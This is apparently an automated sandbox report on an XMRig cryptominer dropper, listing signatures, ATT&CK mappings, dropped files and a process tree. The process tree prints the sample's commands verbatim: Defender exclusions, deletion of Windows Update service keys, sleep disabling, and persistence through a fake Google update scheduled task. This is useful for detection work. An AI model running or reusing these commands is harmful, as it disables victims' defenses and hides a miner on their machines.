Resubmissions

05-04-2023 16:34

230405-t3e6saaa8v 10

31-03-2023 15:09

230331-sjvxfscc5v 10

31-03-2023 13:39

230331-qx416sba8z 10

30-03-2023 21:18

230330-z5tpvafg2x 10

30-03-2023 21:03

230330-zv6awsff8s 10

30-03-2023 18:59

230330-xncnwsfd2y 10

30-03-2023 17:02

230330-vj468sde36 10

30-03-2023 13:33

230330-qtnvsach28 10

30-03-2023 06:37

230330-hdjl5abc45 10

29-03-2023 21:31

230329-1c2enaaa35 10

Analysis

  • max time kernel
    1841s
  • max time network
    1855s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-03-2023 15:09

General

  • Target

    testing.exe

  • Size

    2.1MB

  • MD5

    a12bc9557ad889a49e7b4f970c78dda8

  • SHA1

    5383b8e6d09d41384281b95f9ccc8e050e7c04fa

  • SHA256

    9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0

  • SHA512

    be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee

  • SSDEEP

    24576:MHOygNfXDgkB9Y+AVIGckFdi3MUxbw+0AX4xVILyqe7keglf9BHHpRNt05sJNuI6:MuhBSda2+0+4xKLyqewBnfNwsJNO

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 21 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 21 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3184
      • C:\Users\Admin\AppData\Local\Temp\testing.exe
        "C:\Users\Admin\AppData\Local\Temp\testing.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1736
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:448
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5044
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:1664
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:4528
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:5088
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:2628
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:3108
        • C:\Windows\System32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
          3⤵
            PID:4232
          • C:\Windows\System32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
            3⤵
              PID:4568
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
              3⤵
              • Modifies security service
              PID:4524
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
              3⤵
                PID:4224
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                3⤵
                  PID:3036
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thaqo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4440
              • C:\Windows\System32\cmd.exe
                C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1484
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -hibernate-timeout-ac 0
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2764
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -hibernate-timeout-dc 0
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2780
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-ac 0
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2984
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5068
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mibqiuc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:4816
                • C:\Windows\system32\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                  3⤵
                    PID:2256
                • C:\Windows\system32\taskmgr.exe
                  "C:\Windows\system32\taskmgr.exe" /4
                  2⤵
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:444
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2936
                • C:\Windows\System32\cmd.exe
                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4596
                  • C:\Windows\System32\sc.exe
                    sc stop UsoSvc
                    3⤵
                    • Launches sc.exe
                    PID:2816
                  • C:\Windows\System32\sc.exe
                    sc stop wuauserv
                    3⤵
                    • Launches sc.exe
                    PID:760
                  • C:\Windows\System32\sc.exe
                    sc stop WaaSMedicSvc
                    3⤵
                    • Launches sc.exe
                    PID:1848
                  • C:\Windows\System32\sc.exe
                    sc stop bits
                    3⤵
                    • Launches sc.exe
                    PID:2016
                  • C:\Windows\System32\sc.exe
                    sc stop dosvc
                    3⤵
                    • Launches sc.exe
                    PID:2856
                  • C:\Windows\System32\reg.exe
                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                    3⤵
                      PID:2240
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                      3⤵
                        PID:3724
                      • C:\Windows\System32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                        3⤵
                          PID:4924
                        • C:\Windows\System32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                          3⤵
                            PID:4420
                          • C:\Windows\System32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                            3⤵
                              PID:3656
                          • C:\Windows\System32\cmd.exe
                            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4424
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -hibernate-timeout-ac 0
                              3⤵
                                PID:3748
                              • C:\Windows\System32\powercfg.exe
                                powercfg /x -hibernate-timeout-dc 0
                                3⤵
                                  PID:4796
                                • C:\Windows\System32\powercfg.exe
                                  powercfg /x -standby-timeout-ac 0
                                  3⤵
                                    PID:4168
                                  • C:\Windows\System32\powercfg.exe
                                    powercfg /x -standby-timeout-dc 0
                                    3⤵
                                      PID:2768
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thaqo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                    2⤵
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4152
                                  • C:\Windows\System32\conhost.exe
                                    C:\Windows\System32\conhost.exe piwxkhozdwrizr
                                    2⤵
                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4472
                                  • C:\Windows\System32\cmd.exe
                                    C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                    2⤵
                                    • Drops file in Program Files directory
                                    • Suspicious use of WriteProcessMemory
                                    PID:1112
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic PATH Win32_VideoController GET Name, VideoProcessor
                                      3⤵
                                        PID:4140
                                    • C:\Windows\System32\cmd.exe
                                      C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                      2⤵
                                      • Drops file in Program Files directory
                                      PID:4044
                                    • C:\Windows\System32\conhost.exe
                                      C:\Windows\System32\conhost.exe ajhvfdbttvpjvzel 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUDVw9rZbme/VWRaCGMVy5A4KWmOYusR4Ik0iMHdgwpNOcjbYY5GHdN0CGOwXnubuj1k8SXyOPHLg/wcO08HTPQBCprXvYsSFocqjzqXvCOk3makNm0IivIoZ1KZt2YxT6Ci+BE7B/M5vRdKOrAlIyiTLPowHv2xwlgKELrnhNzBo4cDejdbTidr1qPNdTi4IwjcYnuD1ZGEEk854175l0vqhgS0J4NKy9OfqC4ZDiL7DMzbXsHZBHh2Jw55sStIs/MAZNnhxYjBZpkoZpwPghg6VnLEX8RYirlFk+ArUNG/2+FGzSRQ3kSkHyDV437Fza
                                      2⤵
                                        PID:4804
                                    • C:\Program Files\Google\Chrome\updater.exe
                                      "C:\Program Files\Google\Chrome\updater.exe"
                                      1⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Drops file in Drivers directory
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      • Drops file in Program Files directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of WriteProcessMemory
                                      PID:2140

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v6

                                    Persistence

                                    Modify Existing Service

                                    2
                                    T1031

                                    Defense Evasion

                                    Modify Registry

                                    1
                                    T1112

                                    Impair Defenses

                                    1
                                    T1562

                                    Discovery

                                    Query Registry

                                    2
                                    T1012

                                    Peripheral Device Discovery

                                    1
                                    T1120

                                    System Information Discovery

                                    1
                                    T1082

                                    Impact

                                    Service Stop

                                    1
                                    T1489

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Program Files\Google\Chrome\updater.exe
                                      Filesize

                                      2.1MB

                                      MD5

                                      a12bc9557ad889a49e7b4f970c78dda8

                                      SHA1

                                      5383b8e6d09d41384281b95f9ccc8e050e7c04fa

                                      SHA256

                                      9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0

                                      SHA512

                                      be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee

                                    • C:\Program Files\Google\Chrome\updater.exe
                                      Filesize

                                      2.1MB

                                      MD5

                                      a12bc9557ad889a49e7b4f970c78dda8

                                      SHA1

                                      5383b8e6d09d41384281b95f9ccc8e050e7c04fa

                                      SHA256

                                      9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0

                                      SHA512

                                      be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee

                                    • C:\Program Files\Google\Libs\g.log
                                      Filesize

                                      226B

                                      MD5

                                      fdba80d4081c28c65e32fff246dc46cb

                                      SHA1

                                      74f809dedd1fc46a3a63ac9904c80f0b817b3686

                                      SHA256

                                      b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                                      SHA512

                                      b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                      Filesize

                                      2KB

                                      MD5

                                      d85ba6ff808d9e5444a4b369f5bc2730

                                      SHA1

                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                      SHA256

                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                      SHA512

                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      944B

                                      MD5

                                      62623d22bd9e037191765d5083ce16a3

                                      SHA1

                                      4a07da6872672f715a4780513d95ed8ddeefd259

                                      SHA256

                                      95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                      SHA512

                                      9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      1KB

                                      MD5

                                      3f5870c2f0f7e5545f679e7097c314cd

                                      SHA1

                                      edaebdda389d97695a0429b64e366e875be35603

                                      SHA256

                                      3cdce3d74c42d1b9ce012287f5676470d6d40a29bb98b8d1b1d5c20c49a2d0f8

                                      SHA512

                                      616d8b0980f8ee7febb6b0aeaf52f94ca5c5afdbcb5a4da25f8f80481a62166b123ec61999ea355a1d9a165a7d02ed408029aa492ef9263e05afdb9f18fe0364

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gke42wsa.2i0.ps1
                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Windows\System32\drivers\etc\hosts
                                      Filesize

                                      3KB

                                      MD5

                                      00930b40cba79465b7a38ed0449d1449

                                      SHA1

                                      4b25a89ee28b20ba162f23772ddaf017669092a5

                                      SHA256

                                      eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

                                      SHA512

                                      cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                      Filesize

                                      3KB

                                      MD5

                                      e53add4879e15d7b3415bd191bfbf89e

                                      SHA1

                                      c6a7dcbca4864343ff0f8b7287fe8127139dc3a0

                                      SHA256

                                      3cb5649fc023a91d662304d80667aca9621f7f3c43460c7088a7f11a975e4d64

                                      SHA512

                                      f3f9466f10da6cb6fb8282d4f83c13b625c29b5abc4037ef4596ef06803ae83342f5b6c9bc1977dc204df58713b7716864f951096d01f41e1caced79d55e6831

                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                      Filesize

                                      1KB

                                      MD5

                                      07676a2bd96a52fe12e14bdc0429cc5b

                                      SHA1

                                      ff1e25722eafa7a0200b6f1cd02047cfec0fe03d

                                      SHA256

                                      656c251207d5b928d7889513240efe238489da1db0d236a43fe056807bb4df62

                                      SHA512

                                      6e04dd151afbd4a484e9960731be7ac85a3711a6383de1219c166612c23bb73b0ce4350fbdb30aee0fb0210b6bc58a91ce606ea855c8a910bdfe779b1033049c

                                    • memory/444-219-0x0000017D396F0000-0x0000017D396F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/444-222-0x0000017D396F0000-0x0000017D396F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/444-220-0x0000017D396F0000-0x0000017D396F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/444-225-0x0000017D396F0000-0x0000017D396F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/444-223-0x0000017D396F0000-0x0000017D396F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/444-224-0x0000017D396F0000-0x0000017D396F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/444-221-0x0000017D396F0000-0x0000017D396F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/444-194-0x0000017D396F0000-0x0000017D396F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/444-196-0x0000017D396F0000-0x0000017D396F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/444-195-0x0000017D396F0000-0x0000017D396F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/448-137-0x000002444FBE0000-0x000002444FC02000-memory.dmp
                                      Filesize

                                      136KB

                                    • memory/448-135-0x000002444FB60000-0x000002444FB70000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/448-134-0x000002444FB60000-0x000002444FB70000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1736-133-0x00007FF788D30000-0x00007FF788F46000-memory.dmp
                                      Filesize

                                      2.1MB

                                    • memory/1736-164-0x00007FF788D30000-0x00007FF788F46000-memory.dmp
                                      Filesize

                                      2.1MB

                                    • memory/1736-136-0x00007FF788D30000-0x00007FF788F46000-memory.dmp
                                      Filesize

                                      2.1MB

                                    • memory/1736-174-0x00007FF788D30000-0x00007FF788F46000-memory.dmp
                                      Filesize

                                      2.1MB

                                    • memory/2140-209-0x00007FF7DEA50000-0x00007FF7DEC66000-memory.dmp
                                      Filesize

                                      2.1MB

                                    • memory/2140-193-0x00007FF7DEA50000-0x00007FF7DEC66000-memory.dmp
                                      Filesize

                                      2.1MB

                                    • memory/2140-280-0x00007FF7DEA50000-0x00007FF7DEC66000-memory.dmp
                                      Filesize

                                      2.1MB

                                    • memory/2140-269-0x00007FF7DEA50000-0x00007FF7DEC66000-memory.dmp
                                      Filesize

                                      2.1MB

                                    • memory/2936-236-0x00007FF431DD0000-0x00007FF431DE0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2936-264-0x00000280282A0000-0x00000280282AA000-memory.dmp
                                      Filesize

                                      40KB

                                    • memory/2936-207-0x000002800C050000-0x000002800C060000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2936-212-0x000002800C050000-0x000002800C060000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2936-213-0x000002800C050000-0x000002800C060000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2936-214-0x000002800C050000-0x000002800C060000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2936-206-0x000002800C050000-0x000002800C060000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2936-271-0x000002800C050000-0x000002800C060000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2936-268-0x00000280282F0000-0x00000280282FA000-memory.dmp
                                      Filesize

                                      40KB

                                    • memory/2936-267-0x00000280282E0000-0x00000280282E6000-memory.dmp
                                      Filesize

                                      24KB

                                    • memory/2936-266-0x00000280282B0000-0x00000280282B8000-memory.dmp
                                      Filesize

                                      32KB

                                    • memory/2936-265-0x0000028028300000-0x000002802831A000-memory.dmp
                                      Filesize

                                      104KB

                                    • memory/2936-208-0x000002800C050000-0x000002800C060000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2936-237-0x0000028028070000-0x000002802808C000-memory.dmp
                                      Filesize

                                      112KB

                                    • memory/2936-263-0x00000280282C0000-0x00000280282DC000-memory.dmp
                                      Filesize

                                      112KB

                                    • memory/2936-238-0x0000028028150000-0x000002802815A000-memory.dmp
                                      Filesize

                                      40KB

                                    • memory/4152-262-0x00007FF475E80000-0x00007FF475E90000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4152-270-0x000002AC25420000-0x000002AC25430000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4152-260-0x000002AC25420000-0x000002AC25430000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4152-261-0x000002AC25420000-0x000002AC25430000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4440-166-0x00000269FAA50000-0x00000269FAA60000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4440-165-0x00000269FAA50000-0x00000269FAA60000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4440-163-0x00000269FAA50000-0x00000269FAA60000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4440-167-0x00000269FAA50000-0x00000269FAA60000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4440-168-0x00000269FAA50000-0x00000269FAA60000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4440-170-0x00000269FAA50000-0x00000269FAA60000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4440-159-0x00000269FAA50000-0x00000269FAA60000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4440-161-0x00000269FAA50000-0x00000269FAA60000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4472-292-0x00007FF7938D0000-0x00007FF7938E6000-memory.dmp
                                      Filesize

                                      88KB

                                    • memory/4472-284-0x00007FF7938D0000-0x00007FF7938E6000-memory.dmp
                                      Filesize

                                      88KB

                                    • memory/4804-286-0x0000020CBA440000-0x0000020CBA460000-memory.dmp
                                      Filesize

                                      128KB

                                    • memory/4804-310-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-328-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-281-0x0000020CA9EE0000-0x0000020CA9F00000-memory.dmp
                                      Filesize

                                      128KB

                                    • memory/4804-282-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-283-0x0000020CBA400000-0x0000020CBA440000-memory.dmp
                                      Filesize

                                      256KB

                                    • memory/4804-326-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-285-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-324-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-287-0x0000020CBA460000-0x0000020CBA480000-memory.dmp
                                      Filesize

                                      128KB

                                    • memory/4804-289-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-290-0x0000020CBA440000-0x0000020CBA460000-memory.dmp
                                      Filesize

                                      128KB

                                    • memory/4804-291-0x0000020CBA460000-0x0000020CBA480000-memory.dmp
                                      Filesize

                                      128KB

                                    • memory/4804-322-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-293-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-295-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-298-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-300-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-302-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-304-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-306-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-308-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-320-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-312-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

                                    • memory/4804-314-0x00007FF630E40000-0x00007FF631634000-memory.dmp
                                      Filesize

                                      8.0MB

